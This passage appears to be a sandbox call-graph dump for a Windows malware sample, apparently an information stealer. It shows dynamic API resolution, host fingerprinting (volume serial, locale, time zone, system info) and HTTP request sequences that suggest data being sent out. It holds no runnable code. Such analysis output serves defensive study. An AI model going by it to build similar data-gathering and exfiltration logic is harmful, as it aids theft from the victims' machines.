calls 14137->14138 14139 1004225 14138->14139 14140 10045c0 2 API calls 14139->14140 14141 100423e 14140->14141 14142 10045c0 2 API calls 14141->14142 14143 1004257 14142->14143 14144 10045c0 2 API calls 14143->14144 14145 1004270 14144->14145 14146 10045c0 2 API calls 14145->14146 14147 1004289 14146->14147 14148 10045c0 2 API calls 14147->14148 14149 10042a2 14148->14149 14150 10045c0 2 API calls 14149->14150 14151 10042bb 14150->14151 14152 10045c0 2 API calls 14151->14152 14153 10042d4 14152->14153 14154 10045c0 2 API calls 14153->14154 14155 10042ed 14154->14155 14156 10045c0 2 API calls 14155->14156 14157 1004306 14156->14157 14158 10045c0 2 API calls 14157->14158 14159 100431f 14158->14159 14160 10045c0 2 API calls 14159->14160 14161 1004338 14160->14161 14162 10045c0 2 API calls 14161->14162 14163 1004351 14162->14163 14164 10045c0 2 API calls 14163->14164 14165 100436a 14164->14165 14166 10045c0 2 API calls 14165->14166 14167 1004383 14166->14167 14168 10045c0 2 API calls 14167->14168 14169 100439c 14168->14169 14170 10045c0 2 API calls 14169->14170 14171 10043b5 14170->14171 14172 10045c0 2 API calls 14171->14172 14173 10043ce 14172->14173 14174 10045c0 2 API calls 14173->14174 14175 10043e7 14174->14175 14176 10045c0 2 API calls 14175->14176 14177 1004400 14176->14177 14178 10045c0 2 API calls 14177->14178 14179 1004419 14178->14179 14180 10045c0 2 API calls 14179->14180 14181 1004432 14180->14181 14182 10045c0 2 API calls 14181->14182 14183 100444b 14182->14183 14184 10045c0 2 API calls 14183->14184 14185 1004464 14184->14185 14186 10045c0 2 API calls 14185->14186 14187 100447d 14186->14187 14188 10045c0 2 API calls 14187->14188 14189 1004496 14188->14189 14190 10045c0 2 API calls 14189->14190 14191 10044af 14190->14191 14192 10045c0 2 API calls 14191->14192 14193 10044c8 14192->14193 14194 10045c0 2 API calls 14193->14194 14195 10044e1 14194->14195 14196 10045c0 2 API calls 14195->14196 14197 10044fa 14196->14197 14198 10045c0 2 API calls 14197->14198 14199 1004513 14198->14199 14200 10045c0 2 API calls 14199->14200 14201 100452c 14200->14201 14202 10045c0 2 API calls 14201->14202 14203 1004545 14202->14203 14204 10045c0 2 API calls 14203->14204 14205 100455e 14204->14205 14206 10045c0 2 API calls 14205->14206 14207 1004577 14206->14207 14208 10045c0 2 API calls 14207->14208 14209 1004590 14208->14209 14210 10045c0 2 API calls 14209->14210 14211 10045a9 14210->14211 14212 1019c10 14211->14212 14213 1019c20 43 API calls 14212->14213 14214 101a036 8 API calls 14212->14214 14213->14214 14215 101a146 14214->14215 14216 101a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14214->14216 14217 101a153 8 API calls 14215->14217 14218 101a216 14215->14218 14216->14215 14217->14218 14219 101a298 14218->14219 14220 101a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14218->14220 14221 101a2a5 6 API calls 14219->14221 14222 101a337 14219->14222 14220->14219 14221->14222 14223 101a344 9 API calls 14222->14223 14224 101a41f 14222->14224 14223->14224 14225 101a4a2 14224->14225 14226 101a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14224->14226 14227 101a4ab GetProcAddress GetProcAddress 14225->14227 14228 101a4dc 14225->14228 14226->14225 14227->14228 14229 101a515 14228->14229 14230 101a4e5 GetProcAddress GetProcAddress 14228->14230 14231 101a612 14229->14231 14232 101a522 10 API calls 14229->14232 14230->14229 14233 101a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14231->14233 14234 101a67d 14231->14234 14232->14231 14233->14234 14235 101a686 GetProcAddress 14234->14235 14236 101a69e 14234->14236 14235->14236 14237 101a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14236->14237 14238 1015ca3 14236->14238 14237->14238 14239 1001590 14238->14239 15360 1001670 14239->15360 14242 101a7a0 lstrcpy 14243 10015b5 14242->14243 14244 101a7a0 lstrcpy 14243->14244 14245 10015c7 14244->14245 14246 101a7a0 lstrcpy 14245->14246 14247 10015d9 14246->14247 14248 101a7a0 lstrcpy 14247->14248 14249 1001663 14248->14249 14250 1015510 14249->14250 14251 1015521 14250->14251 14252 101a820 2 API calls 14251->14252 14253 101552e 14252->14253 14254 101a820 2 API calls 14253->14254 14255 101553b 14254->14255 14256 101a820 2 API calls 14255->14256 14257 1015548 14256->14257 14258 101a740 lstrcpy 14257->14258 14259 1015555 14258->14259 14260 101a740 lstrcpy 14259->14260 14261 1015562 14260->14261 14262 101a740 lstrcpy 14261->14262 14263 101556f 14262->14263 14264 101a740 lstrcpy 14263->14264 14304 101557c 14264->14304 14265 101a820 lstrlen lstrcpy 14265->14304 14266 101a8a0 lstrcpy 14266->14304 14267 1015643 StrCmpCA 14267->14304 14268 10156a0 StrCmpCA 14269 10157dc 14268->14269 14268->14304 14270 101a8a0 lstrcpy 14269->14270 14271 10157e8 14270->14271 14272 101a820 2 API calls 14271->14272 14274 10157f6 14272->14274 14273 10151f0 20 API calls 14273->14304 14276 101a820 2 API calls 14274->14276 14275 1015856 StrCmpCA 14277 1015991 14275->14277 14275->14304 14279 1015805 14276->14279 14278 101a8a0 lstrcpy 14277->14278 14280 101599d 14278->14280 14281 1001670 lstrcpy 14279->14281 14282 101a820 2 API calls 14280->14282 14301 1015811 14281->14301 14285 10159ab 14282->14285 14283 101a740 lstrcpy 14283->14304 14284 10152c0 25 API calls 14284->14304 14289 101a820 2 API calls 14285->14289 14286 1015a0b StrCmpCA 14287 1015a16 Sleep 14286->14287 14288 1015a28 14286->14288 14287->14304 14290 101a8a0 lstrcpy 14288->14290 14291 10159ba 14289->14291 14292 1015a34 14290->14292 14293 1001670 lstrcpy 14291->14293 14294 101a820 2 API calls 14292->14294 14293->14301 14295 1015a43 14294->14295 14296 101a820 2 API calls 14295->14296 14297 1015a52 14296->14297 14299 1001670 lstrcpy 14297->14299 14298 101578a StrCmpCA 14298->14304 14299->14301 14300 101a7a0 lstrcpy 14300->14304 14301->13357 14302 101593f StrCmpCA 14302->14304 14303 1001590 lstrcpy 14303->14304 14304->14265 14304->14266 14304->14267 14304->14268 14304->14273 14304->14275 14304->14283 14304->14284 14304->14286 14304->14298 14304->14300 14304->14302 14304->14303 14306 1017553 GetVolumeInformationA 14305->14306 14307 101754c 14305->14307 14308 1017591 14306->14308 14307->14306 14309 10175fc GetProcessHeap RtlAllocateHeap 14308->14309 14310 1017619 14309->14310 14311 1017628 wsprintfA 14309->14311 14312 101a740 lstrcpy 14310->14312 14313 101a740 lstrcpy 14311->14313 14314 1015da7 14312->14314 14313->14314 14314->13378 14316 101a7a0 lstrcpy 14315->14316 14317 1004899 14316->14317 15369 10047b0 14317->15369 14319 10048a5 14320 101a740 lstrcpy 14319->14320 14321 10048d7 14320->14321 14322 101a740 lstrcpy 14321->14322 14323 10048e4 14322->14323 14324 101a740 lstrcpy 14323->14324 14325 10048f1 14324->14325 14326 101a740 lstrcpy 14325->14326 14327 10048fe 14326->14327 14328 101a740 lstrcpy 14327->14328 14329 100490b InternetOpenA StrCmpCA 14328->14329 14330 1004944 14329->14330 14331 1004ecb InternetCloseHandle 14330->14331 15375 1018b60 14330->15375 14333 1004ee8 14331->14333 15390 1009ac0 CryptStringToBinaryA 14333->15390 14334 1004963 15383 101a920 14334->15383 14337 1004976 14339 101a8a0 lstrcpy 14337->14339 14344 100497f 14339->14344 14340 101a820 2 API calls 14341 1004f05 14340->14341 14343 101a9b0 4 API calls 14341->14343 14342 1004f27 ctype 14346 101a7a0 lstrcpy 14342->14346 14345 1004f1b 14343->14345 14348 101a9b0 4 API calls 14344->14348 14347 101a8a0 lstrcpy 14345->14347 14359 1004f57 14346->14359 14347->14342 14349 10049a9 14348->14349 14350 101a8a0 lstrcpy 14349->14350 14351 10049b2 14350->14351 14352 101a9b0 4 API calls 14351->14352 14353 10049d1 14352->14353 14354 101a8a0 lstrcpy 14353->14354 14355 10049da 14354->14355 14356 101a920 3 API calls 14355->14356 14357 10049f8 14356->14357 14358 101a8a0 lstrcpy 14357->14358 14360 1004a01 14358->14360 14359->13381 14361 101a9b0 4 API calls 14360->14361 14362 1004a20 14361->14362 14363 101a8a0 lstrcpy 14362->14363 14364 1004a29 14363->14364 14365 101a9b0 4 API calls 14364->14365 14366 1004a48 14365->14366 14367 101a8a0 lstrcpy 14366->14367 14368 1004a51 14367->14368 14369 101a9b0 4 API calls 14368->14369 14370 1004a7d 14369->14370 14371 101a920 3 API calls 14370->14371 14372 1004a84 14371->14372 14373 101a8a0 lstrcpy 14372->14373 14374 1004a8d 14373->14374 14375 1004aa3 InternetConnectA 14374->14375 14375->14331 14376 1004ad3 HttpOpenRequestA 14375->14376 14378 1004b28 14376->14378 14379 1004ebe InternetCloseHandle 14376->14379 14380 101a9b0 4 API calls 14378->14380 14379->14331 14381 1004b3c 14380->14381 14382 101a8a0 lstrcpy 14381->14382 14383 1004b45 14382->14383 14384 101a920 3 API calls 14383->14384 14385 1004b63 14384->14385 14386 101a8a0 lstrcpy 14385->14386 14387 1004b6c 14386->14387 14388 101a9b0 4 API calls 14387->14388 14389 1004b8b 14388->14389 14390 101a8a0 lstrcpy 14389->14390 14391 1004b94 14390->14391 14392 101a9b0 4 API calls 14391->14392 14393 1004bb5 14392->14393 14394 101a8a0 lstrcpy 14393->14394 14395 1004bbe 14394->14395 14396 101a9b0 4 API calls 14395->14396 14397 1004bde 14396->14397 14398 101a8a0 lstrcpy 14397->14398 14399 1004be7 14398->14399 14400 101a9b0 4 API calls 14399->14400 14401 1004c06 14400->14401 14402 101a8a0 lstrcpy 14401->14402 14403 1004c0f 14402->14403 14404 101a920 3 API calls 14403->14404 14405 1004c2d 14404->14405 14406 101a8a0 lstrcpy 14405->14406 14407 1004c36 14406->14407 14408 101a9b0 4 API calls 14407->14408 14409 1004c55 14408->14409 14410 101a8a0 lstrcpy 14409->14410 14411 1004c5e 14410->14411 14412 101a9b0 4 API calls 14411->14412 14413 1004c7d 14412->14413 14414 101a8a0 lstrcpy 14413->14414 14415 1004c86 14414->14415 14416 101a920 3 API calls 14415->14416 14417 1004ca4 14416->14417 14418 101a8a0 lstrcpy 14417->14418 14419 1004cad 14418->14419 14420 101a9b0 4 API calls 14419->14420 14421 1004ccc 14420->14421 14422 101a8a0 lstrcpy 14421->14422 14423 1004cd5 14422->14423 14424 101a9b0 4 API calls 14423->14424 14425 1004cf6 14424->14425 14426 101a8a0 lstrcpy 14425->14426 14427 1004cff 14426->14427 14428 101a9b0 4 API calls 14427->14428 14429 1004d1f 14428->14429 14430 101a8a0 lstrcpy 14429->14430 14431 1004d28 14430->14431 14432 101a9b0 4 API calls 14431->14432 14433 1004d47 14432->14433 14434 101a8a0 lstrcpy 14433->14434 14435 1004d50 14434->14435 14436 101a920 3 API calls 14435->14436 14437 1004d6e 14436->14437 14438 101a8a0 lstrcpy 14437->14438 14439 1004d77 14438->14439 14440 101a740 lstrcpy 14439->14440 14441 1004d92 14440->14441 14442 101a920 3 API calls 14441->14442 14443 1004db3 14442->14443 14444 101a920 3 API calls 14443->14444 14445 1004dba 14444->14445 14446 101a8a0 lstrcpy 14445->14446 14447 1004dc6 14446->14447 14448 1004de7 lstrlen 14447->14448 14449 1004dfa 14448->14449 14450 1004e03 lstrlen 14449->14450 15389 101aad0 14450->15389 14452 1004e13 HttpSendRequestA 14453 1004e32 InternetReadFile 14452->14453 14454 1004e67 InternetCloseHandle 14453->14454 14459 1004e5e 14453->14459 14456 101a800 14454->14456 14456->14379 14457 101a9b0 4 API calls 14457->14459 14458 101a8a0 lstrcpy 14458->14459 14459->14453 14459->14454 14459->14457 14459->14458 15396 101aad0 14460->15396 14462 10117c4 StrCmpCA 14463 10117cf ExitProcess 14462->14463 14475 10117d7 14462->14475 14464 10119c2 14464->13383 14465 10118ad StrCmpCA 14465->14475 14466 10118cf StrCmpCA 14466->14475 14467 10118f1 StrCmpCA 14467->14475 14468 1011951 StrCmpCA 14468->14475 14469 1011970 StrCmpCA 14469->14475 14470 1011913 StrCmpCA 14470->14475 14471 1011932 StrCmpCA 14471->14475 14472 101185d StrCmpCA 14472->14475 14473 101187f StrCmpCA 14473->14475 14474 101a820 lstrlen lstrcpy 14474->14475 14475->14464 14475->14465 14475->14466 14475->14467 14475->14468 14475->14469 14475->14470 14475->14471 14475->14472 14475->14473 14475->14474 14477 101a7a0 lstrcpy 14476->14477 14478 1005979 14477->14478 14479 10047b0 2 API calls 14478->14479 14480 1005985 14479->14480 14481 101a740 lstrcpy 14480->14481 14482 10059ba 14481->14482 14483 101a740 lstrcpy 14482->14483 14484 10059c7 14483->14484 14485 101a740 lstrcpy 14484->14485 14486 10059d4 14485->14486 14487 101a740 lstrcpy 14486->14487 14488 10059e1 14487->14488 14489 101a740 lstrcpy 14488->14489 14490 10059ee InternetOpenA StrCmpCA 14489->14490 14491 1005a1d 14490->14491 14492 1005fc3 InternetCloseHandle 14491->14492 14493 1018b60 3 API calls 14491->14493 14494 1005fe0 14492->14494 14495 1005a3c 14493->14495 14497 1009ac0 4 API calls 14494->14497 14496 101a920 3 API calls 14495->14496 14498 1005a4f 14496->14498 14499 1005fe6 14497->14499 14500 101a8a0 lstrcpy 14498->14500 14501 101a820 2 API calls 14499->14501 14503 100601f ctype 14499->14503 14505 1005a58 14500->14505 14502 1005ffd 14501->14502 14504 101a9b0 4 API calls 14502->14504 14507 101a7a0 lstrcpy 14503->14507 14506 1006013 14504->14506 14509 101a9b0 4 API calls 14505->14509 14508 101a8a0 lstrcpy 14506->14508 14512 100604f 14507->14512 14508->14503 14510 1005a82 14509->14510 14511 101a8a0 lstrcpy 14510->14511 14513 1005a8b 14511->14513 14512->13389 14514 101a9b0 4 API calls 14513->14514 14515 1005aaa 14514->14515 14516 101a8a0 lstrcpy 14515->14516 14517 1005ab3 14516->14517 14518 101a920 3 API calls 14517->14518 14519 1005ad1 14518->14519 14520 101a8a0 lstrcpy 14519->14520 14521 1005ada 14520->14521 14522 101a9b0 4 API calls 14521->14522 14523 1005af9 14522->14523 14524 101a8a0 lstrcpy 14523->14524 14525 1005b02 14524->14525 14526 101a9b0 4 API calls 14525->14526 14527 1005b21 14526->14527 14528 101a8a0 lstrcpy 14527->14528 14529 1005b2a 14528->14529 14530 101a9b0 4 API calls 14529->14530 14531 1005b56 14530->14531 14532 101a920 3 API calls 14531->14532 14533 1005b5d 14532->14533 14534 101a8a0 lstrcpy 14533->14534 14535 1005b66 14534->14535 14536 1005b7c InternetConnectA 14535->14536 14536->14492 14537 1005bac HttpOpenRequestA 14536->14537 14539 1005fb6 InternetCloseHandle 14537->14539 14540 1005c0b 14537->14540 14539->14492 14541 101a9b0 4 API calls 14540->14541 14542 1005c1f 14541->14542 14543 101a8a0 lstrcpy 14542->14543 14544 1005c28 14543->14544 14545 101a920 3 API calls 14544->14545 14546 1005c46 14545->14546 14547 101a8a0 lstrcpy 14546->14547 14548 1005c4f 14547->14548 14549 101a9b0 4 API calls 14548->14549 14550 1005c6e 14549->14550 14551 101a8a0 lstrcpy 14550->14551 14552 1005c77 14551->14552 14553 101a9b0 4 API calls 14552->14553 14554 1005c98 14553->14554 14555 101a8a0 lstrcpy 14554->14555 14556 1005ca1 14555->14556 14557 101a9b0 4 API calls 14556->14557 14558 1005cc1 14557->14558 14559 101a8a0 lstrcpy 14558->14559 14560 1005cca 14559->14560 14561 101a9b0 4 API calls 14560->14561 14562 1005ce9 14561->14562 14563 101a8a0 lstrcpy 14562->14563 14564 1005cf2 14563->14564 14565 101a920 3 API calls 14564->14565 14566 1005d10 14565->14566 14567 101a8a0 lstrcpy 14566->14567 14568 1005d19 14567->14568 14569 101a9b0 4 API calls 14568->14569 14570 1005d38 14569->14570 14571 101a8a0 lstrcpy 14570->14571 14572 1005d41 14571->14572 14573 101a9b0 4 API calls 14572->14573 14574 1005d60 14573->14574 14575 101a8a0 lstrcpy 14574->14575 14576 1005d69 14575->14576 14577 101a920 3 API calls 14576->14577 14578 1005d87 14577->14578 14579 101a8a0 lstrcpy 14578->14579 14580 1005d90 14579->14580 14581 101a9b0 4 API calls 14580->14581 14582 1005daf 14581->14582 14583 101a8a0 lstrcpy 14582->14583 14584 1005db8 14583->14584 14585 101a9b0 4 API calls 14584->14585 14586 1005dd9 14585->14586 14587 101a8a0 lstrcpy 14586->14587 14588 1005de2 14587->14588 14589 101a9b0 4 API calls 14588->14589 14590 1005e02 14589->14590 14591 101a8a0 lstrcpy 14590->14591 14592 1005e0b 14591->14592 14593 101a9b0 4 API calls 14592->14593 14594 1005e2a 14593->14594 14595 101a8a0 lstrcpy 14594->14595 14596 1005e33 14595->14596 14597 101a920 3 API calls 14596->14597 14598 1005e54 14597->14598 14599 101a8a0 lstrcpy 14598->14599 14600 1005e5d 14599->14600 14601 1005e70 lstrlen 14600->14601 15397 101aad0 14601->15397 14603 1005e81 lstrlen GetProcessHeap RtlAllocateHeap 15398 101aad0 14603->15398 14605 1005eae lstrlen 14606 1005ebe 14605->14606 14607 1005ed7 lstrlen 14606->14607 14608 1005ee7 14607->14608 14609 1005ef0 lstrlen 14608->14609 14610 1005f04 14609->14610 14611 1005f1a lstrlen 14610->14611 15399 101aad0 14611->15399 14613 1005f2a HttpSendRequestA 14614 1005f35 InternetReadFile 14613->14614 14615 1005f6a InternetCloseHandle 14614->14615 14619 1005f61 14614->14619 14615->14539 14617 101a9b0 4 API calls 14617->14619 14618 101a8a0 lstrcpy 14618->14619 14619->14614 14619->14615 14619->14617 14619->14618 14621 1011077 14620->14621 14622 1011151 14621->14622 14623 101a820 lstrlen lstrcpy 14621->14623 14622->13391 14623->14621 14625 1010db7 14624->14625 14626 1010f17 14625->14626 14627 1010ea4 StrCmpCA 14625->14627 14628 1010e27 StrCmpCA 14625->14628 14629 1010e67 StrCmpCA 14625->14629 14630 101a820 lstrlen lstrcpy 14625->14630 14626->13399 14627->14625 14628->14625 14629->14625 14630->14625 14635 1010f67 14631->14635 14632 1011044 14632->13407 14633 1010fb2 StrCmpCA 14633->14635 14634 101a820 lstrlen lstrcpy 14634->14635 14635->14632 14635->14633 14635->14634 14637 101a740 lstrcpy 14636->14637 14638 1011a26 14637->14638 14639 101a9b0 4 API calls 14638->14639 14640 1011a37 14639->14640 14641 101a8a0 lstrcpy 14640->14641 14642 1011a40 14641->14642 14643 101a9b0 4 API calls 14642->14643 14644 1011a5b 14643->14644 14645 101a8a0 lstrcpy 14644->14645 14646 1011a64 14645->14646 14647 101a9b0 4 API calls 14646->14647 14648 1011a7d 14647->14648 14649 101a8a0 lstrcpy 14648->14649 14650 1011a86 14649->14650 14651 101a9b0 4 API calls 14650->14651 14652 1011aa1 14651->14652 14653 101a8a0 lstrcpy 14652->14653 14654 1011aaa 14653->14654 14655 101a9b0 4 API calls 14654->14655 14656 1011ac3 14655->14656 14657 101a8a0 lstrcpy 14656->14657 14658 1011acc 14657->14658 14659 101a9b0 4 API calls 14658->14659 14660 1011ae7 14659->14660 14661 101a8a0 lstrcpy 14660->14661 14662 1011af0 14661->14662 14663 101a9b0 4 API calls 14662->14663 14664 1011b09 14663->14664 14665 101a8a0 lstrcpy 14664->14665 14666 1011b12 14665->14666 14667 101a9b0 4 API calls 14666->14667 14668 1011b2d 14667->14668 14669 101a8a0 lstrcpy 14668->14669 14670 1011b36 14669->14670 14671 101a9b0 4 API calls 14670->14671 14672 1011b4f 14671->14672 14673 101a8a0 lstrcpy 14672->14673 14674 1011b58 14673->14674 14675 101a9b0 4 API calls 14674->14675 14676 1011b76 14675->14676 14677 101a8a0 lstrcpy 14676->14677 14678 1011b7f 14677->14678 14679 1017500 6 API calls 14678->14679 14680 1011b96 14679->14680 14681 101a920 3 API calls 14680->14681 14682 1011ba9 14681->14682 14683 101a8a0 lstrcpy 14682->14683 14684 1011bb2 14683->14684 14685 101a9b0 4 API calls 14684->14685 14686 1011bdc 14685->14686 14687 101a8a0 lstrcpy 14686->14687 14688 1011be5 14687->14688 14689 101a9b0 4 API calls 14688->14689 14690 1011c05 14689->14690 14691 101a8a0 lstrcpy 14690->14691 14692 1011c0e 14691->14692 15400 1017690 GetProcessHeap RtlAllocateHeap 14692->15400 14695 101a9b0 4 API calls 14696 1011c2e 14695->14696 14697 101a8a0 lstrcpy 14696->14697 14698 1011c37 14697->14698 14699 101a9b0 4 API calls 14698->14699 14700 1011c56 14699->14700 14701 101a8a0 lstrcpy 14700->14701 14702 1011c5f 14701->14702 14703 101a9b0 4 API calls 14702->14703 14704 1011c80 14703->14704 14705 101a8a0 lstrcpy 14704->14705 14706 1011c89 14705->14706 15407 10177c0 GetCurrentProcess IsWow64Process 14706->15407 14709 101a9b0 4 API calls 14710 1011ca9 14709->14710 14711 101a8a0 lstrcpy 14710->14711 14712 1011cb2 14711->14712 14713 101a9b0 4 API calls 14712->14713 14714 1011cd1 14713->14714 14715 101a8a0 lstrcpy 14714->14715 14716 1011cda 14715->14716 14717 101a9b0 4 API calls 14716->14717 14718 1011cfb 14717->14718 14719 101a8a0 lstrcpy 14718->14719 14720 1011d04 14719->14720 14721 1017850 3 API calls 14720->14721 14722 1011d14 14721->14722 14723 101a9b0 4 API calls 14722->14723 14724 1011d24 14723->14724 14725 101a8a0 lstrcpy 14724->14725 14726 1011d2d 14725->14726 14727 101a9b0 4 API calls 14726->14727 14728 1011d4c 14727->14728 14729 101a8a0 lstrcpy 14728->14729 14730 1011d55 14729->14730 14731 101a9b0 4 API calls 14730->14731 14732 1011d75 14731->14732 14733 101a8a0 lstrcpy 14732->14733 14734 1011d7e 14733->14734 14735 10178e0 3 API calls 14734->14735 14736 1011d8e 14735->14736 14737 101a9b0 4 API calls 14736->14737 14738 1011d9e 14737->14738 14739 101a8a0 lstrcpy 14738->14739 14740 1011da7 14739->14740 14741 101a9b0 4 API calls 14740->14741 14742 1011dc6 14741->14742 14743 101a8a0 lstrcpy 14742->14743 14744 1011dcf 14743->14744 14745 101a9b0 4 API calls 14744->14745 14746 1011df0 14745->14746 14747 101a8a0 lstrcpy 14746->14747 14748 1011df9 14747->14748 15409 1017980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14748->15409 14751 101a9b0 4 API calls 14752 1011e19 14751->14752 14753 101a8a0 lstrcpy 14752->14753 14754 1011e22 14753->14754 14755 101a9b0 4 API calls 14754->14755 14756 1011e41 14755->14756 14757 101a8a0 lstrcpy 14756->14757 14758 1011e4a 14757->14758 14759 101a9b0 4 API calls 14758->14759 14760 1011e6b 14759->14760 14761 101a8a0 lstrcpy 14760->14761 14762 1011e74 14761->14762 15411 1017a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14762->15411 14765 101a9b0 4 API calls 14766 1011e94 14765->14766 14767 101a8a0 lstrcpy 14766->14767 14768 1011e9d 14767->14768 14769 101a9b0 4 API calls 14768->14769 14770 1011ebc 14769->14770 14771 101a8a0 lstrcpy 14770->14771 14772 1011ec5 14771->14772 14773 101a9b0 4 API calls 14772->14773 14774 1011ee5 14773->14774 14775 101a8a0 lstrcpy 14774->14775 14776 1011eee 14775->14776 15414 1017b00 GetUserDefaultLocaleName 14776->15414 14779 101a9b0 4 API calls 14780 1011f0e 14779->14780 14781 101a8a0 lstrcpy 14780->14781 14782 1011f17 14781->14782 14783 101a9b0 4 API calls 14782->14783 14784 1011f36 14783->14784 14785 101a8a0 lstrcpy 14784->14785 14786 1011f3f 14785->14786 14787 101a9b0 4 API calls 14786->14787 14788 1011f60 14787->14788 14789 101a8a0 lstrcpy 14788->14789 14790 1011f69 14789->14790 15418 1017b90 14790->15418 14792 1011f80 14793 101a920 3 API calls 14792->14793 14794 1011f93 14793->14794 14795 101a8a0 lstrcpy 14794->14795 14796 1011f9c 14795->14796 14797 101a9b0 4 API calls 14796->14797 14798 1011fc6 14797->14798 14799 101a8a0 lstrcpy 14798->14799 14800 1011fcf 14799->14800 14801 101a9b0 4 API calls 14800->14801 14802 1011fef 14801->14802 14803 101a8a0 lstrcpy 14802->14803 14804 1011ff8 14803->14804 15430 1017d80 GetSystemPowerStatus 14804->15430 14807 101a9b0 4 API calls 14808 1012018 14807->14808 14809 101a8a0 lstrcpy 14808->14809 14810 1012021 14809->14810 14811 101a9b0 4 API calls 14810->14811 14812 1012040 14811->14812 14813 101a8a0 lstrcpy 14812->14813 14814 1012049 14813->14814 14815 101a9b0 4 API calls 14814->14815 14816 101206a 14815->14816 14817 101a8a0 lstrcpy 14816->14817 14818 1012073 14817->14818 14819 101207e GetCurrentProcessId 14818->14819 15432 1019470 OpenProcess 14819->15432 14822 101a920 3 API calls 14823 10120a4 14822->14823 14824 101a8a0 lstrcpy 14823->14824 14825 10120ad 14824->14825 14826 101a9b0 4 API calls 14825->14826 14827 10120d7 14826->14827 14828 101a8a0 lstrcpy 14827->14828 14829 10120e0 14828->14829 14830 101a9b0 4 API calls 14829->14830 14831 1012100 14830->14831 14832 101a8a0 lstrcpy 14831->14832 14833 1012109 14832->14833 15437 1017e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14833->15437 14836 101a9b0 4 API calls 14837 1012129 14836->14837 14838 101a8a0 lstrcpy 14837->14838 14839 1012132 14838->14839 14840 101a9b0 4 API calls 14839->14840 14841 1012151 14840->14841 14842 101a8a0 lstrcpy 14841->14842 14843 101215a 14842->14843 14844 101a9b0 4 API calls 14843->14844 14845 101217b 14844->14845 14846 101a8a0 lstrcpy 14845->14846 14847 1012184 14846->14847 15441 1017f60 14847->15441 14850 101a9b0 4 API calls 14851 10121a4 14850->14851 14852 101a8a0 lstrcpy 14851->14852 14853 10121ad 14852->14853 14854 101a9b0 4 API calls 14853->14854 14855 10121cc 14854->14855 14856 101a8a0 lstrcpy 14855->14856 14857 10121d5 14856->14857 14858 101a9b0 4 API calls 14857->14858 14859 10121f6 14858->14859 14860 101a8a0 lstrcpy 14859->14860 14861 10121ff 14860->14861 15454 1017ed0 GetSystemInfo wsprintfA 14861->15454 14864 101a9b0 4 API calls 14865 101221f 14864->14865 14866 101a8a0 lstrcpy 14865->14866 14867 1012228 14866->14867 14868 101a9b0 4 API calls 14867->14868 14869 1012247 14868->14869 14870 101a8a0 lstrcpy 14869->14870 14871 1012250 14870->14871 14872 101a9b0 4 API calls 14871->14872 14873 1012270 14872->14873 14874 101a8a0 lstrcpy 14873->14874 14875 1012279 14874->14875 15456 1018100 GetProcessHeap RtlAllocateHeap 14875->15456 14878 101a9b0 4 API calls 14879 1012299 14878->14879 14880 101a8a0 lstrcpy 14879->14880 14881 10122a2 14880->14881 14882 101a9b0 4 API calls 14881->14882 14883 10122c1 14882->14883 14884 101a8a0 lstrcpy 14883->14884 14885 10122ca 14884->14885 14886 101a9b0 4 API calls 14885->14886 14887 10122eb 14886->14887 14888 101a8a0 lstrcpy 14887->14888 14889 10122f4 14888->14889 15462 10187c0 14889->15462 14892 101a920 3 API calls 14893 101231e 14892->14893 14894 101a8a0 lstrcpy 14893->14894 14895 1012327 14894->14895 14896 101a9b0 4 API calls 14895->14896 14897 1012351 14896->14897 14898 101a8a0 lstrcpy 14897->14898 14899 101235a 14898->14899 14900 101a9b0 4 API calls 14899->14900 14901 101237a 14900->14901 14902 101a8a0 lstrcpy 14901->14902 14903 1012383 14902->14903 14904 101a9b0 4 API calls 14903->14904 14905 10123a2 14904->14905 14906 101a8a0 lstrcpy 14905->14906 14907 10123ab 14906->14907 15467 10181f0 14907->15467 14909 10123c2 14910 101a920 3 API calls 14909->14910 14911 10123d5 14910->14911 14912 101a8a0 lstrcpy 14911->14912 14913 10123de 14912->14913 14914 101a9b0 4 API calls 14913->14914 14915 101240a 14914->14915 14916 101a8a0 lstrcpy 14915->14916 14917 1012413 14916->14917 14918 101a9b0 4 API calls 14917->14918 14919 1012432 14918->14919 14920 101a8a0 lstrcpy 14919->14920 14921 101243b 14920->14921 14922 101a9b0 4 API calls 14921->14922 14923 101245c 14922->14923 14924 101a8a0 lstrcpy 14923->14924 14925 1012465 14924->14925 14926 101a9b0 4 API calls 14925->14926 14927 1012484 14926->14927 14928 101a8a0 lstrcpy 14927->14928 14929 101248d 14928->14929 14930 101a9b0 4 API calls 14929->14930 14931 10124ae 14930->14931 14932 101a8a0 lstrcpy 14931->14932 14933 10124b7 14932->14933 15475 1018320 14933->15475 14935 10124d3 14936 101a920 3 API calls 14935->14936 14937 10124e6 14936->14937 14938 101a8a0 lstrcpy 14937->14938 14939 10124ef 14938->14939 14940 101a9b0 4 API calls 14939->14940 14941 1012519 14940->14941 14942 101a8a0 lstrcpy 14941->14942 14943 1012522 14942->14943 14944 101a9b0 4 API calls 14943->14944 14945 1012543 14944->14945 14946 101a8a0 lstrcpy 14945->14946 14947 101254c 14946->14947 14948 1018320 17 API calls 14947->14948 14949 1012568 14948->14949 14950 101a920 3 API calls 14949->14950 14951 101257b 14950->14951 14952 101a8a0 lstrcpy 14951->14952 14953 1012584 14952->14953 14954 101a9b0 4 API calls 14953->14954 14955 10125ae 14954->14955 14956 101a8a0 lstrcpy 14955->14956 14957 10125b7 14956->14957 14958 101a9b0 4 API calls 14957->14958 14959 10125d6 14958->14959 14960 101a8a0 lstrcpy 14959->14960 14961 10125df 14960->14961 14962 101a9b0 4 API calls 14961->14962 14963 1012600 14962->14963 14964 101a8a0 lstrcpy 14963->14964 14965 1012609 14964->14965 15511 1018680 14965->15511 14967 1012620 14968 101a920 3 API calls 14967->14968 14969 1012633 14968->14969 14970 101a8a0 lstrcpy 14969->14970 14971 101263c 14970->14971 14972 101265a lstrlen 14971->14972 14973 101266a 14972->14973 14974 101a740 lstrcpy 14973->14974 14975 101267c 14974->14975 14976 1001590 lstrcpy 14975->14976 14977 101268d 14976->14977 15521 1015190 14977->15521 14979 1012699 14979->13411 15709 101aad0 14980->15709 14982 1005009 InternetOpenUrlA 14983 1005021 